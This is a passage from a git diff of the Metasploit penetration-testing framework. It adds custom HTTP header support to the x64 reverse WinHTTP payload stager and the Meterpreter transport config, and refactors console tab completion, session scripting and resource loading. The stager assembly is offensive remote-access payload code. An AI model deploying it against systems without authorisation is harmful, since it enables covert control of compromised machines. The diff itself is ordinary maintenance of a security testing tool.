:proxy_host The optional proxy server host to use + # @option opts [Integer] :proxy_port The optional proxy server port to use + # @option opts [String] :proxy_type The optional proxy server type, one of HTTP or SOCKS + # @option opts [String] :proxy_user The optional proxy server username + # @option opts [String] :proxy_pass The optional proxy server password + # @option opts [String] :custom_headers The optional collection of custom headers for the payload. # @option opts [Integer] :retry_count The number of times to retry a failed request before giving up + # @option opts [Integer] :retry_wait The seconds to wait before retry a new request # def asm_reverse_winhttp(opts={}) @@ -169,6 +180,8 @@ module Payload::Windows::ReverseWinHttp_x64 proxy_user = opts[:proxy_user].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:proxy_user]) proxy_pass = opts[:proxy_pass].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:proxy_pass]) + custom_headers = opts[:custom_headers].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:custom_headers]) + http_open_flags = 0x00000100 # WINHTTP_FLAG_BYPASS_PROXY_CACHE secure_flags = ( 0x00002000 | # SECURITY_FLAG_IGNORE_CERT_DATE_INVALID @@ -431,15 +444,29 @@ module Payload::Windows::ReverseWinHttp_x64 pop r9 ; dwBufferLength (4 = size of flags) mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption call rbp + + xor r8, r8 ; dwHeadersLen (0) ^ end - asm << %Q^ - winhttpsendrequest: - mov rcx, rsi ; hRequest (request handle) + if custom_headers + asm << %Q^ + call get_req_headers ; lpszHeaders (pointer to the custom headers) + db #{custom_headers} + get_req_headers: + pop rdx ; lpszHeaders + dec r8 ; dwHeadersLength (assume NULL terminated) + ^ + else + asm << %Q^ push rbx pop rdx ; lpszHeaders (NULL) - xor r8, r8 ; dwHeadersLen (0) + ^ + end + + + asm << %Q^ + mov rcx, rsi ; hRequest (request handle) xor r9, r9 ; lpszVersion (NULL) push rbx ; stack alignment push rbx ; dwContext (0) diff --git a/lib/msf/core/payload_generator.rb b/lib/msf/core/payload_generator.rb index c8a3e0629f..a54fb39482 100644 --- a/lib/msf/core/payload_generator.rb +++ b/lib/msf/core/payload_generator.rb @@ -298,7 +298,7 @@ module Msf # @return [String] Java payload as a JAR or WAR file def generate_java_payload payload_module = framework.payloads.create(payload) - payload_module.datastore.merge!(datastore) + payload_module.datastore.import_options_from_hash(datastore) case format when "raw", "jar" if payload_module.respond_to? :generate_jar diff --git a/lib/msf/core/post/windows/ldap.rb b/lib/msf/core/post/windows/ldap.rb index bcb756e232..466dd736d5 100644 --- a/lib/msf/core/post/windows/ldap.rb +++ b/lib/msf/core/post/windows/ldap.rb @@ -119,7 +119,7 @@ module LDAP domain ||= get_domain if domain.blank? - raise RuntimeError, "Unable to find the domain to query." + raise "Unable to find the domain to query." end if load_extapi @@ -338,7 +338,7 @@ module LDAP init_result = wldap32.ldap_sslinitA(domain, 389, 0) session_handle = init_result['return'] if session_handle == 0 - raise RuntimeError.new("Unable to initialize ldap server: #{init_result["ErrorMessage"]}") + raise "Unable to initialize ldap server: #{init_result["ErrorMessage"]}" end vprint_status("LDAP Handle: #{session_handle}") @@ -352,7 +352,7 @@ module LDAP bind = bind_result['return'] unless bind == 0 wldap32.ldap_unbind(session_handle) - raise RuntimeError.new("Unable to bind to ldap server: #{ERROR_CODE_TO_CONSTANT[bind]}") + raise "Unable to bind to ldap server: #{ERROR_CODE_TO_CONSTANT[bind]}" end if (block_given?) diff --git a/lib/msf/core/post/windows/priv.rb b/lib/msf/core/post/windows/priv.rb index 869e129261..084f9acec7 100644 --- a/lib/msf/core/post/windows/priv.rb +++ b/lib/msf/core/post/windows/priv.rb @@ -194,7 +194,7 @@ module Msf::Post::Windows::Priv # def is_high_integrity? il = get_integrity_level - (il == INTEGRITY_LEVEL_SID[:high] || il == INTEGRITY_LEVEL_SIDE[:system]) + (il == INTEGRITY_LEVEL_SID[:high] || il == INTEGRITY_LEVEL_SID[:system]) end # diff --git a/lib/msf/core/post/windows/services.rb b/lib/msf/core/post/windows/services.rb index 6459c47479..3833fdfa37 100644 --- a/lib/msf/core/post/windows/services.rb +++ b/lib/msf/core/post/windows/services.rb @@ -78,7 +78,7 @@ module Services # ); manag = advapi32.OpenSCManagerA(machine_str,nil,access) if (manag["return"] == 0) - raise RuntimeError.new("Unable to open service manager: #{manag["ErrorMessage"]}") + raise "Unable to open service manager: #{manag["ErrorMessage"]}" end if (block_given?) @@ -115,7 +115,7 @@ module Services def open_service_handle(manager, name, access) handle = advapi32.OpenServiceA(manager, name, access) if (handle["return"] == 0) - raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["ErrorMessage"]}") + raise "Could not open service. OpenServiceA error: #{handle["ErrorMessage"]}" end if (block_given?) @@ -267,7 +267,7 @@ module Services when "manual" then startup_number = START_TYPE_MANUAL when "disable" then startup_number = START_TYPE_DISABLED else - raise RuntimeError, "Invalid Startup Mode: #{mode}" + raise "Invalid Startup Mode: #{mode}" end end @@ -453,7 +453,7 @@ module Services status = advapi32.QueryServiceStatus(service_handle,28) if (status["return"] == 0) - raise RuntimeError.new("Could not query service. QueryServiceStatus error: #{status["ErrorMessage"]}") + raise "Could not query service. QueryServiceStatus error: #{status["ErrorMessage"]}" else ret = parse_service_status_struct(status['lpServiceStatus']) end @@ -485,7 +485,7 @@ module Services vprint_good("[#{name}] Service started") return true else - raise RuntimeError, status + raise status end rescue RuntimeError => s if tried diff --git a/lib/msf/sanity.rb b/lib/msf/sanity.rb deleted file mode 100644 index dc5ef2696d..0000000000 --- a/lib/msf/sanity.rb +++ /dev/null @@ -1,28 +0,0 @@ -# -*- coding: binary -*- -# -# Provides some sanity checks against the ruby build and version -# - -if(RUBY_PLATFORM == 'java') - require 'socket' - s = Socket.new(::Socket::AF_INET, ::Socket::SOCK_STREAM, ::Socket::IPPROTO_TCP) - if(not s.respond_to?('bind')) - $stderr.puts "*** JRuby 1.5.0+ is required to use Metasploit with jRuby" - exit(0) - end - - $stderr.puts "*** Warning: JRuby support is still incomplete, few things will work properly!" - trap Signal::list['INT'] do - Thread.main.raise Interrupt.new - end - - s.close -end - -# Check for OpenSSL and print a warning if it is not installed -begin - require 'openssl' -rescue ::LoadError - $stderr.puts "*** The ruby-openssl library is not installed, many features will be disabled!" - $stderr.puts "*** Examples: Meterpreter, SSL Sockets, SMB/NTLM Authentication, and more" -end diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 0cbc9416f5..85cd12da4a 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -47,7 +47,7 @@ class Core "-q" => [ false, "Quiet mode" ], "-k" => [ true, "Terminate sessions by session ID and/or range" ], "-K" => [ false, "Terminate all sessions" ], - "-s" => [ true, "Run a script on the session given with -i, or all" ], + "-s" => [ true, "Run a script or module on the session given with -i, or all" ], "-r" => [ false, "Reset the ring buffer for the session given with -i, or all" ], "-u" => [ true, "Upgrade a shell to a meterpreter session on many platforms" ], "-t" => [ true, "Set a response timeout (default: 15)" ], @@ -1107,7 +1107,7 @@ class Core if active_module # intentionally += and not << because we don't want to modify # datastore or the constant DefaultPrompt - prompt += " #{active_module.type}(%bld%red#{active_module.shortname}%clr)" + prompt += " #{active_module.type}(%bld%red#{active_module.promptname}%clr)" end prompt_char = framework.datastore['PromptChar'] || Msf::Ui::Console::Driver::DefaultPromptChar driver.update_prompt("#{prompt} ", prompt_char, true) @@ -1180,10 +1180,10 @@ class Core sid = val || false when "-K" method = 'killall' - # Run a script on all meterpreter sessions + # Run a script or module on specified sessions when "-s" unless script - method = 'scriptall' + method = 'script' script = val end # Upload and exec to the specific command session @@ -1389,15 +1389,11 @@ class Core sid = nil end end - when 'scriptall' + when 'script' unless script - print_error("No script specified!") + print_error("No script or module specified!") return false end - script_paths = {} - script_paths['meterpreter'] = Msf::Sessions::Meterpreter.find_script_path(script) - script_paths['shell'] = Msf::Sessions::CommandShell.find_script_path(script) - sessions = sid ? session_list : framework.sessions.keys.sort sessions.each do |sess_id| @@ -1413,15 +1409,13 @@ class Core session.response_timeout = response_timeout end begin - if script_paths[session.type] - print_status("Session #{sess_id} (#{session.session_host}):") - print_status("Running script #{script} on #{session.type} session" + - " #{sess_id} (#{session.session_host})") - begin - session.execute_file(script_paths[session.type], extra) - rescue ::Exception => e - log_error("Error executing script: #{e.class} #{e}") - end + print_status("Session #{sess_id} (#{session.session_host}):") + print_status("Running #{script} on #{session.type} session" + + " #{sess_id} (#{session.session_host})") + begin + session.execute_script(script, *extra) + rescue ::Exception => e + log_error("Error executing script or module: #{e.class} #{e}") end ensure if session.respond_to?(:response_timeout) && last_known_timeout @@ -1443,14 +1437,9 @@ class Core session.response_timeout = response_timeout end begin - if ['shell', 'powershell'].include?(session.type) - session.init_ui(driver.input, driver.output) - session.execute_script('post/multi/manage/shell_to_meterpreter') - session.reset_ui - else - print_error("Session #{sess_id} is not a command shell session, it is #{session.type}, skipping...") - next - end + session.init_ui(driver.input, driver.output) + session.execute_script('post/multi/manage/shell_to_meterpreter') + session.reset_ui ensure if session.respond_to?(:response_timeout) && last_known_timeout session.response_timeout = last_known_timeout @@ -2209,16 +2198,7 @@ class Core if rh and not rh.empty? res << Rex::Socket.source_address(rh) else - res << Rex::Socket.source_address - # getifaddrs was introduced in 2.1.2 - if Socket.respond_to?(:getifaddrs) - ifaddrs = Socket.getifaddrs.find_all do |ifaddr| - ((ifaddr.flags & Socket::IFF_LOOPBACK) == 0) && - ifaddr.addr && - ifaddr.addr.ip? - end - res += ifaddrs.map { |ifaddr| ifaddr.addr.ip_address } - end + res += tab_complete_source_address end else end diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index e37a16a350..3155a0a7c9 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -354,6 +354,8 @@ class Db end end + @@hosts_columns = [ 'address', 'mac', 'name', 'os_name', 'os_flavor', 'os_sp', 'purpose', 'info', 'comments'] + def cmd_hosts(*args) return unless active? ::ActiveRecord::Base.connection_pool.with_connection { @@ -371,7 +373,7 @@ class Db default_columns << 'tags' # Special case virtual_columns = [ 'svcs', 'vulns', 'workspace', 'tags' ] - col_search = [ 'address', 'mac', 'name', 'os_name', 'os_flavor', 'os_sp', 'purpose', 'info', 'comments'] + col_search = @@hosts_columns default_columns.delete_if {|v| (v[-2,2] == "id")} while (arg = args.shift) @@ -380,7 +382,7 @@ class Db mode << :add when '-d','--delete' mode << :delete - when '-c' + when '-c','-C' list = args.shift if(!list) print_error("Invalid column list") @@ -394,6 +396,10 @@ class Db return end } + if (arg == '-C') + @@hosts_columns = col_search + end + when '-u','--up' onlyup = true when '-o' @@ -426,6 +432,7 @@ class Db print_line " -a,--add Add the hosts instead of searching" print_line " -d,--delete Delete the hosts instead of searching" print_line " -c Only show the given columns (see list below)" + print_line " -C Only show the given columns until the next restart (see list below)" print_line " -h,--help Show this help information" print_line " -u,--up Only show hosts which are up" print_line " -o Send output to a file in csv format" @@ -1826,6 +1833,8 @@ class Db if (path) auth, dest = path.split('@') (dest = auth and auth = nil) if not dest + # remove optional scheme in database url + auth = auth.sub(/^\w+:\/\//, "") if auth res[:user],res[:pass] = auth.split(':') if auth targ,name = dest.split('/') (name = targ and targ = nil) if not name diff --git a/lib/msf/ui/console/command_dispatcher/exploit.rb b/lib/msf/ui/console/command_dispatcher/exploit.rb index 08ac8aa8a7..5d6f0a5564 100644 --- a/lib/msf/ui/console/command_dispatcher/exploit.rb +++ b/lib/msf/ui/console/command_dispatcher/exploit.rb @@ -164,6 +164,21 @@ class Exploit end end + def cmd_exploit_tabs(str, words) + fmt = { + '-e' => [ framework.encoders.map { |refname, mod| refname } ], + '-f' => [ nil ], + '-h' => [ nil ], + '-j' => [ nil ], + '-n' => [ framework.nops.map { |refname, mod| refname } ], + '-o' => [ true ], + '-p' => [ framework.payloads.map { |refname, mod| refname } ], + '-t' => [ true ], + '-z' => [ nil ] + } + tab_complete_generic(fmt, str, words) + end + alias cmd_run cmd_exploit def cmd_exploit_help diff --git a/lib/msf/ui/console/command_dispatcher/jobs.rb b/lib/msf/ui/console/command_dispatcher/jobs.rb index 85fc1071d1..797e0b9192 100644 --- a/lib/msf/ui/console/command_dispatcher/jobs.rb +++ b/lib/msf/ui/console/command_dispatcher/jobs.rb @@ -341,6 +341,19 @@ module Msf print_status "Payload handler running as background job #{job_id}." end + + def cmd_handler_tabs(str, words) + fmt = { + '-h' => [ nil ], + '-x' => [ nil ], + '-p' => [ framework.payloads.map { |refname, mod| refname } ], + '-P' => [ true ], + '-H' => [ :address ], + '-e' => [ framework.encoders.map { |refname, mod| refname } ], + '-n' => [ true ] + } + tab_complete_generic(fmt, str, words) + end end end end diff --git a/lib/msf/ui/console/command_dispatcher/modules.rb b/lib/msf/ui/console/command_dispatcher/modules.rb index b3142c5302..6238599397 100644 --- a/lib/msf/ui/console/command_dispatcher/modules.rb +++ b/lib/msf/ui/console/command_dispatcher/modules.rb @@ -94,10 +94,12 @@ module Msf print_status("Launching #{editor} #{path}") system(editor, path) - # XXX: This will try to reload *anything* and break on modules - if args.length > 0 + # XXX: This will try to reload *any* .rb and break on modules + if args.length > 0 && path.end_with?('.rb') print_status("Reloading #{path}") load path + else + print_error('Only Ruby files can be reloaded (use reload/rerun for modules)') end else print_error('Nothing to edit -- try using a module first.') @@ -659,7 +661,7 @@ module Msf # Update the command prompt prompt = framework.datastore['Prompt'] || Msf::Ui::Console::Driver::DefaultPrompt prompt_char = framework.datastore['PromptChar'] || Msf::Ui::Console::Driver::DefaultPromptChar - driver.update_prompt("#{prompt} #{mod.type}(%bld%red#{mod.shortname}%clr) ", prompt_char, true) + driver.update_prompt("#{prompt} #{mod.type}(%bld%red#{mod.promptname}%clr) ", prompt_char, true) end # diff --git a/lib/msf/ui/console/command_dispatcher/payload.rb b/lib/msf/ui/console/command_dispatcher/payload.rb index 16e1e3f8b3..9edeb071ca 100644 --- a/lib/msf/ui/console/command_dispatcher/payload.rb +++ b/lib/msf/ui/console/command_dispatcher/payload.rb @@ -13,7 +13,7 @@ module Msf include Msf::Ui::Console::ModuleCommandDispatcher # Load supported formats - supported_formats = \ + @@supported_formats = \ Msf::Simple::Buffer.transform_formats + \ Msf::Util::EXE.to_executable_fmt_formats @@ -25,7 +25,7 @@ module Msf "-o" => [ true, "A comma separated list of options in VAR=VAL format." ], "-s" => [ true, "NOP sled length." ], "-f" => [ true, "The output file name (otherwise stdout)" ], - "-t" => [ true, "The output format: #{supported_formats.join(',')}" ], + "-t" => [ true, "The output format: #{@@supported_formats.join(',')}" ], "-p" => [ true, "The Platform for output." ], "-k" => [ false, "Keep the template executable functional" ], "-x" => [ true, "The executable template to use" ], @@ -151,6 +151,24 @@ module Msf end true end + + def cmd_generate_tabs(str, words) + fmt = { + '-b' => [ true ], + '-E' => [ nil ], + '-e' => [ framework.encoders.map { |refname, mod| refname } ], + '-h' => [ nil ], + '-o' => [ true ], + '-s' => [ true ], + '-f' => [ :file ], + '-t' => [ @@supported_formats ], + '-p' => [ true ], + '-k' => [ nil ], + '-x' => [ :file ], + '-i' => [ true ] + } + tab_complete_generic(fmt, str, words) + end end end end diff --git a/lib/msf/ui/console/command_dispatcher/resource.rb b/lib/msf/ui/console/command_dispatcher/resource.rb index b020bd743f..8f2e6277fd 100644 --- a/lib/msf/ui/console/command_dispatcher/resource.rb +++ b/lib/msf/ui/console/command_dispatcher/resource.rb @@ -59,8 +59,8 @@ module Msf elsif # let's check to see if it's in the scripts/resource dir (like when tab completed) [ - ::Msf::Config.script_directory + ::File::SEPARATOR + "resource", - ::Msf::Config.user_script_directory + ::File::SEPARATOR + "resource" + ::Msf::Config.script_directory + ::File::SEPARATOR + 'resource', + ::Msf::Config.user_script_directory + ::File::SEPARATOR + 'resource' ].each do |dir| res_path = dir + ::File::SEPARATOR + res if ::File.exist?(res_path) @@ -97,7 +97,7 @@ module Msf [ ::Msf::Config.script_directory + File::SEPARATOR + "resource", ::Msf::Config.user_script_directory + File::SEPARATOR + "resource", - "." + '.' ].each do |dir| next if not ::File.exist? dir tabs += ::Dir.new(dir).find_all { |e| diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb index 1e303bf4ee..fd53c3278b 100644 --- a/lib/msf/ui/console/driver.rb +++ b/lib/msf/ui/console/driver.rb @@ -138,15 +138,6 @@ class Driver < Msf::Ui::Driver print_error("***") end - begin - require 'openssl' - rescue ::LoadError - print_error("***") - print_error("* WARNING: No OpenSSL support. This is required by meterpreter payloads and many exploits") - print_error("* Please install the ruby-openssl package (apt-get install libopenssl-ruby on Debian/Ubuntu") - print_error("***") - end - # Register event handlers register_event_handlers @@ -191,24 +182,10 @@ class Driver < Msf::Ui::Driver end end - # framework.db.active will be true if after_establish_connection ran directly when connection_established? was - # already true or if framework.db.connect called after_establish_connection. - if !! framework.db.error - if framework.db.error.to_s =~ /RubyGem version.*pg.*0\.11/i - print_error("***") - print_error("*") - print_error("* Metasploit now requires version 0.11 or higher of the 'pg' gem for database support") - print_error("* There a three ways to accomplish this upgrade:") - print_error("* 1. If you run Metasploit with your system ruby, simply upgrade the gem:") - print_error("* $ rvmsudo gem install pg ") - print_error("* 2. Use the Community Edition web interface to apply a Software Update") - print_error("* 3. Uninstall, download the latest version, and reinstall Metasploit") - print_error("*") - print_error("***") - print_error("") - print_error("") - end - + # framework.db.active will be true if after_establish_connection ran + # directly when connection_established? was already true or if + # framework.db.connect called after_establish_connection. + if !!framework.db.error print_error("Failed to connect to the database: #{framework.db.error}") end end @@ -250,108 +227,6 @@ class Driver < Msf::Ui::Driver end end - # - # Configure a default output path for jUnit XML output - # - def junit_setup(output_path) - output_path = ::File.expand_path(output_path) - - ::FileUtils.mkdir_p(output_path) - @junit_output_path = output_path - @junit_error_count = 0 - print_status("Test Output: #{output_path}") - - # We need at least one test success in order to pass - junit_pass("framework_loaded") - end - - # - # Emit a new jUnit XML output file representing an error - # - def junit_error(tname, ftype, data = nil) - - if not @junit_output_path - raise RuntimeError, "No output path, call junit_setup() first" - end - - data ||= framework.inspect.to_s - - e = REXML::Element.new("testsuite") - - c = REXML::Element.new("testcase") - c.attributes["classname"] = "msfrc" - c.attributes["name"] = tname - - f = REXML::Element.new("failure") - f.attributes["type"] = ftype - - f.text = data - c << f - e << c - - bname = ("msfrpc_#{tname}").gsub(/[^A-Za-z0-9\.\_]/, '') - bname << "_" + Digest::MD5.hexdigest(tname) - - fname = ::File.join(@junit_output_path, "#{bname}.xml") - cnt = 0 - while ::File.exist?( fname ) - cnt += 1 - fname = ::File.join(@junit_output_path, "#{bname}_#{cnt}.xml") - end - - ::File.open(fname, "w") do |fd| - fd.write(e.to_s) - end - - print_error("Test Error: #{tname} - #{ftype} - #{data}") - end - - # - # Emit a new jUnit XML output file representing a success - # - def junit_pass(tname) - - if not @junit_output_path - raise RuntimeError, "No output path, call junit_setup() first" - end - - # Generate the structure of a test case run - e = REXML::Element.new("testsuite") - c = REXML::Element.new("testcase") - c.attributes["classname"] = "msfrc" - c.attributes["name"] = tname - e << c - - # Generate a unique name - bname = ("msfrpc_#{tname}").gsub(/[^A-Za-z0-9\.\_]/, '') - bname << "_" + Digest::MD5.hexdigest(tname) - - # Generate the output path, allow multiple test with the same name - fname = ::File.join(@junit_output_path, "#{bname}.xml") - cnt = 0 - while ::File.exist?( fname ) - cnt += 1 - fname = ::File.join(@junit_output_path, "#{bname}_#{cnt}.xml") - end - - # Write to our test output location, as specified with junit_setup - ::File.open(fname, "w") do |fd| - fd.write(e.to_s) - end - - print_good("Test Pass: #{tname}") - end - - - # - # Emit a jUnit XML output file and throw a fatal exception - # - def junit_fatal_error(tname, ftype, data) - junit_error(tname, ftype, data) - print_error("Exiting") - run_single("exit -y") - end - # # Loads configuration that needs to be analyzed before the framework # instance is created. diff --git a/lib/msf/ui/console/module_command_dispatcher.rb b/lib/msf/ui/console/module_command_dispatcher.rb index 7f378440cc..7064ce6e83 100644 --- a/lib/msf/ui/console/module_command_dispatcher.rb +++ b/lib/msf/ui/console/module_command_dispatcher.rb @@ -209,10 +209,10 @@ module ModuleCommandDispatcher end rhost = instance.datastore['RHOST'] - rport = nil + rport = instance.datastore['RPORT'] peer = rhost - if instance.datastore['rport'] - rport = instance.rport + if rport + rport = instance.rport if instance.respond_to?(:rport) peer = "#{rhost}:#{rport}" end diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index e5f502838a..f60175244a 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -1122,7 +1122,7 @@ require 'msf/core/exe/segment_appender' to_exe_elf(framework, opts, "template_x64_linux_dll.bin", code) end - # self.to_linux_mipsle_elf + # self.to_linux_armle_elf # # @param framework [Msf::Framework] # @param code [String] @@ -1133,6 +1133,17 @@ require 'msf/core/exe/segment_appender' to_exe_elf(framework, opts, "template_armle_linux.bin", code) end + # self.to_linux_aarch64_elf + # + # @param framework [Msf::Framework] + # @param code [String] + # @param opts [Hash] + # @option [String] :template + # @return [String] Returns an elf + def self.to_linux_aarch64_elf(framework, code, opts = {}) + to_exe_elf(framework, opts, "template_aarch64_linux.bin", code) + end + # self.to_linux_mipsle_elf # Little Endian # @param framework [Msf::Framework] diff --git a/lib/rex/payloads/meterpreter/config.rb b/lib/rex/payloads/meterpreter/config.rb index 2c0479c9af..b3f56043cd 100644 --- a/lib/rex/payloads/meterpreter/config.rb +++ b/lib/rex/payloads/meterpreter/config.rb @@ -108,15 +108,19 @@ private cert_hash = "\x00" * CERT_HASH_SIZE cert_hash = opts[:ssl_cert_hash] if opts[:ssl_cert_hash] + custom_headers = opts[:custom_headers] || '' + custom_headers = to_str(custom_headers, custom_headers.length + 1) + # add the HTTP specific stuff - transport_data << proxy_host # Proxy host name - transport_data << proxy_user # Proxy user name - transport_data << proxy_pass # Proxy password - transport_data << ua # HTTP user agent - transport_data << cert_hash # SSL cert hash for verification + transport_data << proxy_host # Proxy host name + transport_data << proxy_user # Proxy user name + transport_data << proxy_pass # Proxy password + transport_data << ua # HTTP user agent + transport_data << cert_hash # SSL cert hash for verification + transport_data << custom_headers # any custom headers that the client needs # update the packing spec - pack << 'A*A*A*A*A*' + pack << 'A*A*A*A*A*A*' end # return the packed transport information diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb index 69d509ef89..79132a548c 100644 --- a/lib/rex/post/meterpreter/client_core.rb +++ b/lib/rex/post/meterpreter/client_core.rb @@ -139,15 +139,16 @@ class ClientCore < Extension response.each(TLV_TYPE_TRANS_GROUP) { |t| result[:transports] << { - :url => t.get_tlv_value(TLV_TYPE_TRANS_URL), - :comm_timeout => t.get_tlv_value(TLV_TYPE_TRANS_COMM_TIMEOUT), - :retry_total => t.get_tlv_value(TLV_TYPE_TRANS_RETRY_TOTAL), - :retry_wait => t.get_tlv_value(TLV_TYPE_TRANS_RETRY_WAIT), - :ua => t.get_tlv_value(TLV_TYPE_TRANS_UA), - :proxy_host => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_HOST), - :proxy_user => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_USER), - :proxy_pass => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_PASS), - :cert_hash => t.get_tlv_value(TLV_TYPE_TRANS_CERT_HASH) + :url => t.get_tlv_value(TLV_TYPE_TRANS_URL), + :comm_timeout => t.get_tlv_value(TLV_TYPE_TRANS_COMM_TIMEOUT), + :retry_total => t.get_tlv_value(TLV_TYPE_TRANS_RETRY_TOTAL), + :retry_wait => t.get_tlv_value(TLV_TYPE_TRANS_RETRY_WAIT), + :ua => t.get_tlv_value(TLV_TYPE_TRANS_UA), + :proxy_host => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_HOST), + :proxy_user => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_USER), + :proxy_pass => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_PASS), + :cert_hash => t.get_tlv_value(TLV_TYPE_TRANS_CERT_HASH), + :custom_headers => t.get_tlv_value(TLV_TYPE_TRANS_HEADERS) } } @@ -555,6 +556,7 @@ class ClientCore < Extension # We cannot migrate into a process that we are unable to open # On linux, arch is empty even if we can access the process if client.platform == 'windows' + if target_process['arch'] == nil || target_process['arch'].empty? raise RuntimeError, "Cannot migrate into this process (insufficient privileges)", caller end @@ -718,7 +720,8 @@ private # Get a reference to the currently active transport. # def get_current_transport - transport_list[:transports][0] + x = transport_list + x[:transports][0] end # @@ -728,6 +731,7 @@ private def generate_migrate_stub(target_process) stub = nil + if client.platform == 'windows' && [ARCH_X86, ARCH_X64].include?(client.arch) t = get_current_transport diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb index a027e25233..35fb4b0da1 100644 --- a/lib/rex/post/meterpreter/packet.rb +++ b/lib/rex/post/meterpreter/packet.rb @@ -102,7 +102,8 @@ TLV_TYPE_TRANS_PROXY_USER = TLV_META_TYPE_STRING | 437 TLV_TYPE_TRANS_PROXY_PASS = TLV_META_TYPE_STRING | 438 TLV_TYPE_TRANS_RETRY_TOTAL = TLV_META_TYPE_UINT | 439 TLV_TYPE_TRANS_RETRY_WAIT = TLV_META_TYPE_UINT | 440 -TLV_TYPE_TRANS_GROUP = TLV_META_TYPE_GROUP | 441 +TLV_TYPE_TRANS_HEADERS = TLV_META_TYPE_STRING | 441 +TLV_TYPE_TRANS_GROUP = TLV_META_TYPE_GROUP | 442 TLV_TYPE_MACHINE_ID = TLV_META_TYPE_STRING | 460 TLV_TYPE_UUID = TLV_META_TYPE_RAW | 461 diff --git a/lib/rex/post/meterpreter/packet_parser.rb b/lib/rex/post/meterpreter/packet_parser.rb index 28bd1ef584..ca646e39fd 100644 --- a/lib/rex/post/meterpreter/packet_parser.rb +++ b/lib/rex/post/meterpreter/packet_parser.rb @@ -27,27 +27,28 @@ class PacketParser end # - # Reads data from the wire and parse as much of the packet as possible. + # Reads data from the socket and parses as much of the packet as possible. # def recv(sock) - bytes_left = self.packet.raw_bytes_required - - if bytes_left > 0 - raw = sock.read(bytes_left) - if raw + raw = nil + if self.packet.raw_bytes_required > 0 + while (raw = sock.read(self.packet.raw_bytes_required)) self.packet.add_raw(raw) - else - raise EOFError + break if self.packet.raw_bytes_required == 0 end end - if self.packet.raw_bytes_required == 0 - packet = self.packet - reset - return packet + if self.packet.raw_bytes_required > 0 + if raw == nil + raise EOFError + else + return nil + end end - nil + packet = self.packet + reset + packet end protected diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb index a9cafc2d71..5d854c6fd1 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb @@ -1530,49 +1530,73 @@ class Console::CommandDispatcher::Core end def cmd_resource_help - print_line('Usage: resource [path2 ...]') + print_line "Usage: resource path1 [path2 ...]" print_line - print_line('Run the commands stored in the supplied files.') + print_line "Run the commands stored in the supplied files (- for stdin)." + print_line "Resource files may also contain ERB or Ruby code between tags." print_line end def cmd_resource(*args) if args.empty? + cmd_resource_help return false end - args.each do |glob| - files = ::Dir.glob(::File.expand_path(glob)) - if files.empty? - print_error("No such file #{glob}") - next - end - files.each do |filename| - print_status("Reading #{filename}") - if (not ::File.readable?(filename)) - print_error("Could not read file #{filename}") - next - else - ::File.open(filename, 'r').each_line do |line| - next if line.strip.length < 1 - next if line[0,1] == '#' - begin - print_status("Running #{line}") - client.console.run_single(line) - rescue ::Exception => e - print_error("Error Running Command #{line}: #{e.class} #{e}") - end - + args.each do |res| + good_res = nil + if res == '-' + good_res = res + elsif ::File.exist?(res) + good_res = res + elsif + # let's check to see if it's in the scripts/resource dir (like when tab completed) + [ + ::Msf::Config.script_directory + ::File::SEPARATOR + 'resource' + ::File::SEPARATOR + 'meterpreter', + ::Msf::Config.user_script_directory + ::File::SEPARATOR + 'resource' + ::File::SEPARATOR + 'meterpreter' + ].each do |dir| + res_path = dir + ::File::SEPARATOR + res + if ::File.exist?(res_path) + good_res = res_path + break end end end + if good_res + client.console.load_resource(good_res) + else + print_error("#{res} is not a valid resource file") + next + end end end def cmd_resource_tabs(str, words) - return [] if words.length > 1 - - tab_complete_filenames(str, words) + tabs = [] + #return tabs if words.length > 1 + if ( str and str =~ /^#{Regexp.escape(::File::SEPARATOR)}/ ) + # then you are probably specifying a full path so let's just use normal file completion + return tab_complete_filenames(str,words) + elsif (not words[1] or not words[1].match(/^\//)) + # then let's start tab completion in the scripts/resource directories + begin + [ + ::Msf::Config.script_directory + ::File::SEPARATOR + 'resource' + ::File::SEPARATOR + 'meterpreter', + ::Msf::Config.user_script_directory + ::File::SEPARATOR + 'resource' + ::File::SEPARATOR + 'meterpreter', + '.' + ].each do |dir| + next if not ::File.exist? dir + tabs += ::Dir.new(dir).find_all { |e| + path = dir + ::File::SEPARATOR + e + ::File.file?(path) and ::File.readable?(path) + } + end + rescue Exception + end + else + tabs += tab_complete_filenames(str,words) + end + return tabs end def cmd_enable_unicode_encoding diff --git a/lib/rex/ui/text/dispatcher_shell.rb b/lib/rex/ui/text/dispatcher_shell.rb index 878010829c..24096284bf 100644 --- a/lib/rex/ui/text/dispatcher_shell.rb +++ b/lib/rex/ui/text/dispatcher_shell.rb @@ -2,6 +2,7 @@ require 'rex/ui' require 'pp' require 'rex/text/table' +require 'erb' module Rex module Ui @@ -248,6 +249,56 @@ module DispatcherShell matches end + # + # Provide a generic tab completion function based on the specification + # pass as fmt. The fmt argument in a hash where values are an array + # defining how the command should be completed. The first element of the + # array can be 